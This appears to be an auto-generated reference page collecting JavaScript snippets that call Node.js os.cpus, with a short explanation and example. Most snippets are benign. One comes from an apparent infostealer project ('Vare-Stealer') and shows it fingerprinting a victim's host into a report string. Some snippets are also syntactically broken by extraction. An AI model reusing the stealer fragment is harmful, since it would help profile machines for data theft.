How to use the cpus function from os
Find comprehensive JavaScript os.cpus code examples handpicked from public code repositorys.
os.cpus is a built-in Node.js module used to retrieve information about the computer's CPUs such as the number of cores and their speed.
GitHub: thumbsup/thumbsup
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}, 'concurrency': { group: 'Output options:', description: 'Number of parallel parsing/processing operations', type: 'number', 'default': os.cpus().length }, 'output-structure': { group: 'Output options:', description: 'File and folder structure for output media',
GitHub: cedalo/management-center
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const data = Object.values(globalSystem); usageTracker.send({ data, os: { arch: os.arch(), cpus: os.cpus(), platform: os.platform(), release: os.release(), version: os.version() }
How does os.cpus work?
os.cpus is a built-in Node.js module that provides information about the computer's CPUs. When called, os.cpus returns an array of objects, each representing a single CPU core on the system. Each CPU object contains properties that describe various aspects of the CPU, including the speed of the CPU, the amount of time it has spent idle or executing user code, and the amount of time it has spent executing system-level code. In addition to providing information about the CPU cores themselves, os.cpus can also be used to determine the number of CPU cores available on the system. This can be useful for optimizing applications that perform parallel processing or other CPU-intensive tasks. One important thing to note is that os.cpus is a synchronous operation, meaning that it will block the Node.js event loop until the operation completes. For this reason, it is generally recommended to use os.cpus sparingly, especially in applications that require a high degree of responsiveness. Overall, os.cpus provides a convenient way to access information about the computer's CPUs, allowing developers to optimize their applications for the underlying hardware and achieve better performance.
GitHub: saintdaddy/Vare-Stealer
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}); fs.mkdir(process.env.APPDATA + `\\${cr}_${os.hostname}${random}${random}\\[VARE] User`, (err) => { }); let appdata = process.env.APPDATA; const cpu = os.cpus()[0].model; const ram = os.totalmem(); const ramingb = (ram / 1024 / 1024 / 1024).toFixed(2); const version = os.version() data += `~|~|~ Vare$tealer ~|~|~\n`;
GitHub: Ayush-pandey-u/Chiku-MD
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break //Hosted platfrom info case 'statusbot': case 'server':{ const used = process.memoryUsage() const cpus = os.cpus().map(cpu => { = Object.keys(cpu.times).reduce((last, type) => last + cpu.times[type], 0) return cpu }) const cpu = cpus.reduce((last, cpu, _, { length }) => {
Ai Example
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const os = require("os"); const cpus = os.cpus(); console.log(`Number of CPU cores: ${cpus.length}`); console.log(`CPU speed: ${cpus[0].speed} MHz`);
In this example, we first import the os module using the require function. We then call os.cpus to retrieve an array of objects representing each CPU core on the system. We can access the length of the cpus array to determine the number of CPU cores available on the system. In this example, we log this value to the console. We can also access various properties of each CPU core object to obtain more detailed information about the system's hardware. For example, we might access the speed property of the first CPU core object to obtain the clock speed of the CPU. In this example, we log this value to the console as well. By using os.cpus, we can obtain information about the system's hardware and use this information to optimize our applications for better performance.
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opens += 2 datasetsRaster[i] = gdal.openAsync(testFileRaster) datasetsVector[i] = gdal.openAsync(testFileVector) } const cpuUserStart = os.cpus().map((cpu) => cpu.times.user).reduce((a, x) => a + x, 0) const cpuIdleStart = os.cpus().map((cpu) => cpu.times.idle).reduce((a, x) => a + x, 0) const timeStart = let timeEnd if (!process.argv[2] || isNaN(parseInt(process.argv[2]))) {
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GitHub: amrulizwan/botwa
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break; case 'tes': case 'stats': { const used = process.memoryUsage(); const cpus = os.cpus().map((cpu) => { = Object.keys(cpu.times).reduce((last, type) => last + cpu.times[type], 0); return cpu; }); const cpu = cpus.reduce(
GitHub: cenfun/starfall-cli
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const Gauge = require('gauge'); const gauge = new Gauge(); // get system number of cpus const numCPUs = os.cpus().length; // test single process // numCPUs = 1; const npmConfig = rc('npm', {
GitHub: Rmdhn-20/gura-run
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case 'ping': //if (!isOwner) return reply(mess.OnlyOwner) const timestamp = speed() const latensi = speed() - timestamp //var { upload, download } = await checkBandwidth() reply(`*BOT STATUS*\n× *Speed :* ${latensi.toFixed(4)} Second\n× *Runtime :* ${runtime(process.uptime())}\n\n*HOST*\n× *Arch :* ${os.arch()}\n× *CPU :* ${os.cpus()[0].model}${os.cpus().length > 1 ? " (" + os.cpus().length + "x)" : ""}\n× *Platform :* ${os.platform()}\n`) break case 'rules': { if (cekUser("id", sender) == null) return reply(mess.OnlyUser) let text_rules = `${rulesBot()}`
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else if (fs.existsSync('/var/run')) DEFAULT_PID_LOC = '/var/run/'; else DEFAULT_PID_LOC = os.tmpdir(); const TOTAL_CPU_VCORES = os.cpus().length; const DEFAULT_CORES = TOTAL_CPU_VCORES - 1; var worker, dcpConfig; const EXIT_CLEAN = 0; // normal exit, no error
GitHub: helson-lin/ffandown
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const DOWNLOADZIP = require('download') const os = require('os') const m3u8ToMp4 = require('./m3u8') const converter = new m3u8ToMp4() const logger = require('./log') const cpuNum = os.cpus().length // const GITHUBURL = '' const GITHUBURL = '' /** * @description: find config.yaml location
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const express = require('express'); const sessionRoutes = require('./session/session-routes') const authMiddleware = require('../middlawares/auth') const minimist = require("minimist") const os = require('os'); const cpuCores = os.cpus(); const router = express.Router(); const mockTest = require("../../storage/faker") const mock = new mockTest()
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includeModules: false, packager: 'npm', packagerOptions: {}, keepOutputDirectory: false, config: null, concurrency: os.cpus().length, }; class Configuration { constructor(custom) {
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data.version = process.version; data.memory = process.memoryUsage().rss; data.executionPath = process.argv[0]; =; data.folderPath = process.cwd(); data.cpus = os.cpus().length; res.render('info', {layout: false, data}) }; signin_error = (req, res) => {
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break; case 34: // Ready At ? [Timestamp] result = botClient.readyTimestamp; break; case 35: // CPU Core Amount result = os.cpus().length; break; case 36: // Total Memory (GB) result = (((os.totalmem() / 1024) / 1024) / 1024).toFixed(2); break;
GitHub: HomieOmie/nodebb-temp
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}, configurable: true, enumerable: true, }); Minifier.maxThreads = os.cpus().length - 1; Minifier.killAll = function () { pool.forEach((child) => { child.kill('SIGTERM');
GitHub: HomieOmie/nodebb-temp
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let series = nconf.get('series') || options.series; if (series === undefined) { // Detect # of CPUs and select strategy as appropriate winston.verbose('[build] Querying CPU core count for build strategy'); const cpus = os.cpus(); series = cpus.length < 4; winston.verbose(`[build] System returned ${cpus.length} cores, opting for ${series ? 'series' : 'parallel'} build strategy`); }
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* @returns {number} */ static getAvailableNumberOfCores(parallel) { // In some cases cpus() returns undefined // const cpus = os.cpus() || { length: 1 }; return parallel === true ? cpus.length - 1 : Math.min(Number(parallel) || 0, cpus.length - 1); }
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return(usage.toFixed(usage < 10 && i > 0 ? 1 : 0) + ' ' + units[i]); } function handleOS(ping) { var os = require("os"); var cpus = os.cpus(); var speed, chips; for (var i of cpus) chips = i.model, speed = i.speed; if (cpus == undefined) return; else return msg =
GitHub: MyBooty165/ProxLol
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crossDomainPort: 8081, publicDir: path.join(__dirname, '../public'), // set to null to disable // enable or disable multithreading enableWorkers, workers: os.cpus().length, // ssl object is either null or { key: fs.readFileSync('path/to/key'), cert: fs.readFileSync('path/to/cert') } // for more info, see ssl: null,
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var totalCores = ""; var avgClockMHz = ""; var percents = ""; var osInfo = ""; avgClockMHz = await cpuStat.avgClockMHz(); osInfo = os.cpus(); await cpuStat.usagePercent(function(err, percent, seconds) { if (err) { return console.log(err); }
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